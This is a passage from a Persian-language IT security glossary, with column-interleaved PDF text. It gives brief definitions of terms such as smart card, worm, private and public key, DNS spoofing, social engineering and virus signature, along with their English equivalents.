ﺷﺒﻜﻪ" ،ﻛﻠﻴﺪ" ﻏﺎﻟﺒﹰﺎ ﺑﻪ "ﻧﺸﺎﻥ" ﻳـﺎ ﻳـﻚ ﺍﺑـﺰﺍﺭ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻭﺳﻴﻠﻪﺍﻱ ﻣﺸﺎﺑﻪ ﻳﻚ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎ ﻣﺪﺍﺭ ﻣﻴﻜﺮﻭﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺍﻃﻼﻕ ﻣﻲﺷﻮﺩ؛ ﻭﺳﻴﻠﻪﺍﻱ ﻛﻪ ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﻭ ﺩﺭﻳﺎﻓﺖ ﻣﺘﻘﺎﺑﻞ ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﺷﺨﺺ .ﺍﻳﻦ ﻭﺳـﻴﻠﻪ ﻳـﻚ
ﭘﺮﺳــﺸﻬﺎ ﻭ ﭘﺎﺳــﺨﻬﺎ ﺩﺭ ﻃــﻮﻝ ﻓﺮﺁﻳﻨــﺪ ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ ﺑﻜــﺎﺭ ﻛﻠﻴﺪ ﻳﺎ ﻧﺸﺎﻥ -ﻣﺸﺎﺑﻪ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
ﻣﻲﺭﻭﺩ .ﻛﻠﻴﺪﻫﺎ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻭﺳـﺎﻳﻞ ﺳـﺨﺖﺍﻓـﺰﺍﻱ ﻛﻮﭼـﻚ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ -ﻧﻴﺴﺖ.
ﻣﺸﺎﺑﻪ ﻣﺎﺷﻴﻦﺣﺴﺎﺑﻬﺎﻱ ﺟﻴﺒﻲ ﻳﺎ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﺷﻨﺪ ،ﻭ ﻳـﺎ ٤٤٦
ﻛﺪﮔﺸﺎﻳﻲ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻱ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻧـﺮﻡﺍﻓـﺰﺍﺭ
ﺗﺒﺪﻳﻞ ﻣﺘﻮﻥ ﻛﺪﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﻪ ﻣﺘﻮﻥ ﺳﺎﺩﺓ ﺍﻭﻟﻴﻪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺣﻔﺎﻇﺖﺷﺪﻩ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
ﻳﻚ ﺭﻭﺵ ﻛﺪﮔﺬﺍﺭﻱ ﻭ ﻛﺪﮔﺸﺎﻳﻲ ﻣﺘﻘﺎﺑﻞ.
٤٥١
ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ٤٤٧
ﻛﺮﻡ
ﺁﻥ ﺟﺰﺀ ﺍﺯ ﻳﻚ ﺟﻔﺖ ﻛﻠﻴﺪ ﺭﻣﺰ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﻛﻪ ﺗﻮﺳـﻂ
ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻄﻮﺭ ﻣﺴﺘﻘﻞ ﺍﺟﺮﺍ ﺷﻮﺩ ،ﻧـﻮﻉ
ﻣﺎﻟﻚ ﺁﻥ ﺑﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻬﺪﺍﺭﻱ ﻣﻲ ﺷﻮﺩ .ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ
ﻛﺎﻣﻠﻲ ﺍﺯ ﺧﻮﺩ ﺭﺍ ﺭﻭﻱ ﻣﻴﺰﺑﺎﻧﻬﺎﻱ ﺩﻳﮕﺮ ﺷﺒﻜﻪ ﺗﻜﺜﻴﺮ ﻛﻨﺪ ،ﻣﻨﺎﺑﻊ
ﺑــﺮﺍﻱ ﺭﻣﺰﮔــﺸﺎﻳﻲ ﭘﻴﺎﻣﻬــﺎﻳﻲ ﻛــﻪ ﺑــﺎ ﻛﻠﻴــﺪ ﻋﻤــﻮﻣﻲ ﻣﺘﻨــﺎﻇﺮ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﺨﺮﺏ ﻣﺼﺮﻑ ﻧﻤﺎﻳﺪ؛ ﻭ ﻧﻬﺎﻳﺘـﹰﺎ ﻣﻨﺠـﺮ ﺑـﻪ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﺑﻜـﺎﺭ ﻣـﻲﺭﻭﺩ .ﺍﻳـﻦ ﻛﻠﻴـﺪ ﻫﻤﭽﻨـﻴﻦ ﺩﺭ
ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺭﻭﻱ ﺷﺒﻜﻪ ﻳﺎ ﺷﺒﻜﻪﻫﺎ ﮔﺮﺩﺩ.
ﺍﻳﺠﺎﺩ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ .ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ،ﺳـﻨﺪﻱ
ﻛﻪ ﺑﺎﻳﺪ ﺍﻣﻀﺎ ﺷﻮﺩ ﺑﺎ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺩﺭﻫﻤﺮﻳﺰﻱ ﺧﻼﺻـﻪﺳـﺎﺯﻱ ٤٤٨
ﻛﺮﻡ ﺷﺒﻜﻪﺍﻱ
ﻣﻲﺷﻮﺩ ،ﻭ ﺳﭙﺲ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﻓﺎﻳﻞ ﺩﺳﺘﻮﺭﻱ ﻳﺎ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺍﺯ ﻳﻚ ﺷﺒﻜﺔ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑﻌﻨـﻮﺍﻥ
ﻣﻲﮔﺮﺩﺩ .ﺍﻳﻦ ﻓﺮﺁﻳﻨﺪ ﻣﺠﻤﻮﻋـﹰﺎ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﺭﺍ ﺗـﺸﻜﻴﻞ ﻭﺳﻴﻠﻪﺍﻱ ﺑﺮﺍﻱ ﺗﺄﺛﻴﺮﮔﺬﺍﺭﻱ ﻧﺎﻣﻄﻠﻮﺏ ﺑﺮ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻـﺤﺖ،
ﻣﻲﺩﻫﺪ. ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ،ﻭ ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺍﺳـﺘﻔﺎﺩﻩ
٤٥٢ ﻣﻲﻛﻨﺪ .ﻛﺮﻡ ﺷﺒﻜﻪﺍﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﺎ ﺑﺮﻗـﺮﺍﺭﻱ ﻳـﻚ ﺍﺭﺗﺒـﺎﻁ
ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ
ﺷﺒﻜﻪﺍﻱ ﺍﺯ ﺳﻴﺴﺘﻤﻲ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﺩﻳﮕـﺮ ﺣﻤﻠـﻪ ﻛﻨـﺪ .ﻛﺮﻣﻬـﺎ
ﺁﻥ ﺟﺰﺀ ﺍﺯ ﻳﻚ ﺟﻔﺖ ﻛﻠﻴﺪ ﺭﻣﺰ ﻋﻤﻮﻣﻲ ﻭ ﺧﺼﻮﺻﻲ ﻛﻪ ﻫﻤﻪ ﺍﺯ ﻻ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺴﺘﻘﻠﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﺑﻪ ﺷﺒﻜﻪﻫـﺎ ﻣﻌﻤﻮ ﹰ
ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺭﻧﺪ .ﺍﺯ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺑـﺮﺍﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﻳﻚ ﻓﺎﻳﻞ ﻣﻴﺰﺑﺎﻥ ﻣﺘﺼﻞ ﺷﺪﻩ ﺑﺎﺷﻨﺪ.
ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺗﻨﻬﺎ ﺑﻪ ﻳﻚ ﮔﻴﺮﻧﺪﺓ ﺧﺎﺹ ﺑﺮﺳﺪ ،ﻭ ﻳﺎ ﺭﻣﺰﮔﺸﺎﻳﻲ ٤٤٩
ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ
ﻳﻚ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﻭ ﺻـﺤﺖ
ﭘﻴﺎﻡ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ. ﻳﻚ ﺗﺨﻠﻒ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻃﻲ ﺁﻥ ﻣﻬـﺎﺟﻢ ﺑـﺮﺍﻱ ﺑﺪﺳـﺖ ﺁﻭﺭﺩﻥ
ﭘﻮﻝ ،ﺍﻃﻼﻋﺎﺕ ،ﻳﺎ ﺳﺮﻣﺎﻳﺔ ﺩﻳﮕـﺮﻱ ﺍﺯ ﻳـﻚ ﺷـﺮﻛﺖ ﻳـﺎ ﻳـﻚ
ﻛﻨﺘﺮﻝ ﻻ ﻫﻤﺔ ﺍﻧﻮﺍﻉ ﺟـﺮﺍﺋﻢ
ﺷﺨﺺ ﺣﻘﻴﻘﻲ ﻣﺮﺗﻜﺐ ﺁﻥ ﻣﻲﺷﻮﺩ .ﻣﻌﻤﻮ ﹰ
ﻋﻤﻠﻴﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺷﺮﻛﺖ ،ﻛﻪ ﺁﻧـﺮﺍ ﺑـﺮﺍﻱ ﻛـﺎﻫﺶ ﻣﺨـﺎﻃﺮﺓ ﻻ ﺷﺎﻣﻞﺩﺭ ﺍﻳﻦ ﺗﻌﺮﻳﻒ ﻣﻲﮔﻨﺠﻨﺪ .ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻌﻤﻮ ﹰ
ﺍﻓﺸﺎﻱ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺑﻜﺎﺭ ﻣﻲﺑﻨﺪﺩ. ﺗﻐﻴﻴﺮ ،ﺗﺨﺮﻳﺐ ،ﺳﺮﻗﺖ ،ﻭ ﺍﻓﺸﺎﻱ ﺍﻃﻼﻋﺎﺕ ﻣﻲﺷﻮﺩ.
444 User
445 Smart Card
446 Decode
450 Key 447 Worm
451 Private Key 448 Network Worm
452 Public Key 449 Computer Fraud
٤٦٣ ﭘﻴﻮﺳﺘﻬﺎ
٤٥٨ ٤٥٣
ﻣﺨﺎﻃﺮﻩ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ
ﺍﺣﺘﻤﺎﻝ ﺍﻳﻨﻜﻪ ﻳﻚ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﺧﺎﺹ ﺳﻴﺴﺘﻢ ﺗﺼﺎﺩﻓﹰﺎ ﻳﺎ ﺗﻌﻤﺪﹰﺍ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺭﻭﺍﻟﻬـﺎ ﻛـﻪ ﺗﻮﺳـﻂ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ،ﺳـﺨﺖﺍﻓـﺰﺍﺭ ،ﻭ
ﻣﻮﺭﺩ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ. ﺭﺍﻫﺒﺮﺍﻥ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﺩﺳﺘﺮﺳﻲ ،ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﻘﺎﺿـﻲ
ﺩﺳﺘﺮﺳﻲ ،ﺿﺒﻂ ﺗﻼﺷﻬﺎﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ،ﻭ ﺍﻋﻄـﺎ ﻳـﺎ ﺳـﻠﺐ
٤٥٩
ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺧﻄﺮ ﺩﺳﺘﺮﺳﻲ ﺍﻧﺠـﺎﻡ ﻣـﻲﺷـﻮﺩ .ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﻭ ﻛﻨﺘﺮﻟﻬـﺎﻱ
ﻋﻤﻠﻴﺎﺗﻲ ﻛﻪ ﻳﻚ ﺷﺮﻛﺖ ﺑﺮﺍﻱ ﻛﺎﻫﺶ ﺗﻬﺪﻳﺪﺍﺕ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺩﺳﺘﺮﺳﻲ ﺑﺎﻳﺪ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻫﻤﺎﻫﻨﮓ ﺑﺎﺷﻨﺪ ﺗﺎ ﺍﺯ ﻛﺎﺭﺑﺮﺩ ﻏﻴﺮﻣﺠﺎﺯ
ﺍﺗﺨﺎﺫ ﻣﻲﻛﻨﺪ .ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺧﻄﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻬﻴﻪ ﻭ ﺑﻜـﺎﺭﮔﻴﺮﻱ ﻳـﻚ ﻫﺮﻳﻚ ﺍﺯ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻤﻲ ﺗﻮﺳﻂ ﻋﻮﺍﻣﻞ ﺧﺎﺭﺟﻲ )ﻣﻬﺎﺟﻤـﺎﻥ( ﻭ ﻳﺎ
ﺍﺑﺰﺍﺭ ﺳﺨﺖﺍﻓﺰﺍﻱ ،ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ،ﻭ ﻳﺎ ﻳﻚ ﺭﻭﺍﻝ ﺍﻧﺠـﺎﻡ ﻛـﺎﺭ ﻋﻮﺍﻣﻞ ﺩﺍﺧﻠﻲ )ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﻧﺒﺎﻳﺪ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﺪ( ﺟﻠـﻮﮔﻴﺮﻱ
ﺑﺎﺷﺪ. ﺷﻮﺩ.
٤٦٠
ﻣﻤﻴﺰﻱ ٤٥٤
ﮔﻤﺮﺍﻩﺳﺎﺯﻱ
ﺟﻤــﻊﺁﻭﺭﻱ ﺍﻃﻼﻋــﺎﺕ ﺫﺧﻴــﺮﻩﺷــﺪﺓ ﻣــﺴﺘﻘﻞ ﺑــﺮﺍﻱ ﺑﺮﺭﺳــﻲ ﻭ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﺯ ﻃﺮﻳﻖ ﺗﻐﻴﻴـﺮ ﭼﻬـﺮﻩ
ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺁﻧﻬﺎ. ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ.
٤٦١
ﻣﻤﻴﺰﻱ ﺍﻣﻨﻴﺘﻲ ٤٥٥
ﮔﻤﺮﺍﻩﺳﺎﺯﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺩﺍﻣﻨﻪ
ﺑﺎﺯﺑﻴﻨﻲ ﻣﺴﺘﻘﻞ ﻭ ﺣﺮﻓﻪ ﺍﻱ ﺍﻣﻨﻴﺖ ﻛﻪ ﺗﻄﺒﻴﻖ ﻛﻨﺘﺮﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺣﺎﻟﺘﻲ ﮔﻔﺘﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﺭﺍﻳﺎﻧﻪ -ﺑﺎ ﺗﺨﺮﻳﺐ ﺁﻥ ﻗـﺴﻤﺖ
ﺷﺮﻛﺖ ﺑﺎ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ .ﻃﺒﻖ ﻧﺘﻴﺠﺔ ﺍﺯ ﺣﺎﻓﻈﺔ ﻧﻬﺎﻥ ﻛﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﻣﻲﺷﻮﺩ ،ﻭ ﻳـﺎ
ﺍﻳﻦ ﺑﺎﺯﺑﻴﻨﻲ ،ﺣﺴﺎﺑﺮﺱ ﻗﺎﺩﺭ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﺗﻐﻴﻴﺮﺍﺕ ﻻﺯﻡ ﺩﺭ ﻣـﻮﺭﺩ ﺗﺴﺨﻴﺮ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺑﺮﺍﻱ ﻳﻚ ﺩﺍﻣﻨﺔ ﻣﻌﺘﺒﺮ -ﺧـﻮﺩ
ﻛﻨﺘﺮﻟﻬﺎ ،ﺳﻴﺎﺳﺘﻬﺎ ،ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻧﻴﺰ ﭘﻴﺸﻨﻬﺎﺩ ﻛﻨﺪ. ﺭﺍ ﺑﺠﺎﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ ﺩﺍﻣﻨﻪ ﺟﺎ ﻣﻲﺯﻧﺪ.
٤٦٢
ﻣﻬﺎﺟﻢ ٤٥٦
ﻣﺠﻮﺯ
ﻣﻮﺟﻮﺩﻱ ﻛﻪ ﺑـﺪﻭﻥ ﻣﺠـﻮﺯ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻳـﺎ ﻣﻨـﺎﺑﻊ ﺳﻴـﺴﺘﻤﻲ ﻋﻤﻠﻴﺎﺕ ﻣﺠﺎﺯﻱ )ﺧﻮﺍﻧﺪﻥ ،ﻧﻮﺷـﺘﻦ ،ﺍﺻـﻼﺡ ﻭ ﺣـﺬﻑ( ﻛـﻪ ﺷـﺨﺺ
ﺩﺳﺘﺮﺳﻲ ﭘﻴﺪﺍ ﻣﻲﻛﻨﺪ ﻭ ﻳﺎ ﺑﺮﺍﻱ ﺑﺪﺳﺖﺁﻭﺭﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺗﻼﺵ ﻣﻲﺗﻮﺍﻧﺪ ﺁﻧﻬﺎ ﺭﺍ ﺭﻭﻱ ﻳﻚ ﻫﺪﻑ )ﻣﺜ ﹰﻼ ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎ( ﺍﻧﺠـﺎﻡ
ﻣﻲﻛﻨﺪ. ﺩﻫﺪ.
٤٦٣
ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ٤٥٧
ﻣﺤﺮﻣﺎﻧﮕﻲ
ﺣﻤﻠﻪﺍﻱ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﻓﺮﻳﺐ ﻛﺎﺭﺑﺮﺍﻥ ﻳـﺎ ﺭﺍﻫﺒـﺮﺍﻥ ﺍﺩﺍﺭﺓ ﻫـﺪﻑ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺣـﺴﺎﺱ ﺗﻨﻬـﺎ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺍﻓـﺮﺍﺩ ﻳـﺎ
ﻻ ﺍﺯ ﻃﺮﻳـﻖ
ﺍﻧﺠﺎﻡ ﻣﻲ ﮔﻴﺮﺩ .ﺣﻤﻼﺕ ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ﻣﻌﻤـﻮ ﹰ ﮔﺮﻭﻫﻬﺎﻱ ﺧﺎﺻﻲ )ﺍﺯ ﺩﺍﺧﻞ ﻳﺎ ﺧﺎﺭﺝ ﺳـﺎﺯﻣﺎﻥ( ﻗـﺮﺍﺭ ﺩﺍﺭﻧـﺪ .ﻣﻴـﺰﺍﻥ
ﺗﻠﻔﻦ ﺯﺩﻥ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻭ ﺗﻈﺎﻫﺮ ﻣﻬﺎﺟﻢ ﺑـﻪ ﺍﻳﻨﻜـﻪ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﻃﻼﻋﺎﺕ ﺑﺴﺘﻪ ﺑﻪ ﺩﺭﺟﺔ ﺣﻔﺎﻇﺘﻲ ﺍﺳﺖ ﻛﻪ ﺳﺎﺯﻣﺎﻥ
ﻣﺠﺎﺯ ﺳﻴﺴﺘﻢ ﺍﺳﺖ ﺍﻧﺠﺎﻡ ﻣﻲﮔﻴﺮﺩ. ﺑﺮﺍﻱ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺍﺳﺖ.
ﻣﺤﻴﻂ
ﻣﺠﻤﻮﻋﺔ ﻣﻮﻗﻌﻴﺘﻬﺎ ،ﺷﺮﺍﻳﻂ ،ﻭ ﻋﻮﺍﻣﻞ ﺑﻴﺮﻭﻧـﻲ ﻛـﻪ ﺑـﺮ ﺗﻮﺳـﻌﻪ،
ﺑﺨﺶ ﺷﺸﻢ
458 Risk
459 Countermeasure
460 Audit 453 Access Control
461 Security Audit 454 Spoof
462 Intruder 455 Domain Name Server Spoofing
463 Social Engineering 456 Permissions
457 Confidentiality
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٦٤
٤٦٨ ٤٦٤
ﻧﺸﺎﻥ ﺍﻧﻌﻄﺎﻑ ﺩﺭ ﻣﻘﺎﺑﻞ ﺧﻄﺎ
ﻋﺎﻣﻞ ﺍﺻﻠﻲ ﺍﻋﺘﻤﺎﺩ ﺩﺭ ﻃﻮﻝ ﻓﺮﺁﻳﻨﺪ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﺎﺭﺑﺮﺍﻥ. ﻳﻚ ﺷﻴﻮﺓ ﻃﺮﺍﺣﻲ ﻛﻪ ﻫﻨﮕﺎﻡ ﺑﺮﻭﺯ ﺧﻄﺎﻫﺎﻱ ﻓـﺮﺩﻱ ﺑـﺎ ﺍﻳﺠـﺎﺩ
ﻧﺸﺎﻧﻬﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻛﻮﭼﻜﻲ ﻣﺜﻞ ﺗﺮﺍﺷﻪﻫﺎﻱ ﺟﻴﺒﻲ ﻭ ﻋﻨﺎﺻﺮ ﺗﻜﺮﺍﺭﻱ ﺩﺭ ﺳﻴﺴﺘﻢ ،ﻋﻤﻠﻜﺮﺩ ﻣﺪﺍﻭﻡ ﺳﻴﺴﺘﻢ ﺭﺍ ﺗـﻀﻤﻴﻦ
ﻳﺎ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﺑﺎﺷﻨﺪ. ﻣﻲﻛﻨﺪ.
٤٦٩ ٤٦٥
ﻧﺸﺎﻥ ﻭﻳﺮﻭﺱ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ
ﻋﻼﺋﻢ ﻣﺸﺨﺼﺔ ﻳﻚ ﻭﻳﺮﻭﺱ ﻛﻪ ﺗﻮﺳﻂ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﻳﻚ ﻧﺎﻡ ﻭ ﻳﻚ ﺭﻣﺰ ﻣﺤﺮﻣﺎﻧـﻪ ﻛـﻪ ﻛـﺎﺭﺑﺮ ﺭﺍ ﺑـﻪ ﻳـﻚ ﺳﻴـﺴﺘﻢ
ﺍﻣﻨﻴﺘﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ،ﺭﺩﻳﺎﺑﻲ ﻭ ﺑﺎ ﺁﻧﻬـﺎ ﻣﺒـﺎﺭﺯﻩ ﻣـﻲﺷـﻮﺩ .ﻓﻌـﺎﻟﺘﺮﻳﻦ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻳﺎ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﻌﺮﻓﻲ ﻣـﻲﻛﻨـﺪ .ﻳـﻚ ﺭﻭﺵ ﺳـﻨﺘﻲ ﻭ
ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﺍﺯ ﺟﻤﻠـﻪ ) Norton ،McAfeeﺧـﺼﻮﺻﹰﺎ ﺟﺎ ﺍﻓﺘﺎﺩﻩ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮﺍﻥ.
ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺁﻧﻬﺎ ﺷﺎﻣﻞ ﺿﺪﻭﻳﺮﻭﺱ ﻭ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ( ﻭ ﻣﺎﻳﻜﺮﻭﺳـﺎﻓﺖ
٤٦٦
ﻛﻪ ﺩﺭ ﺟﻬﺖ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺶ ﺗـﻼﺵ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ
ﻣﻲ ﻛﻨﺪ ،ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﻭﺻﻠﻪﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﻣﺘﻦ ﺁﻧﻬﺎ ﺗﺤﺖ ﺷﺮﺍﻳﻄﻲ ﺗﻮﺯﻳـﻊ ﻣـﻲﺷـﻮﺩ ﻛـﻪ
ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ. ﻫﺮﮔﻮﻧﻪ ﺍﺻﻼﺡ ﻭ ﺗﻮﺯﻳﻊ ﺭﺍﻳﮕﺎﻥ ﺁﻥ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺍﺳﺖ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ
ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﺍﺳﺖ ،ﺍﻓﺮﺍﺩ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑﺒﻴﻨﻨـﺪ ﻛـﻪ ﺁﻥ
٤٧٠
ﻧﻔﻮﺫ ﺑﺮﻧﺎﻣﻪ ﭼﮕﻮﻧﻪ ﻛﺎﺭ ﻣﻲﻛﻨﺪ ﻭ ﺧﻮﺍﻫﻨﺪ ﺗﻮﺍﻧﺴﺖ ﺁﻧﺮﺍ ﺗﻐﻴﻴـﺮ ﺩﻫﻨـﺪ.
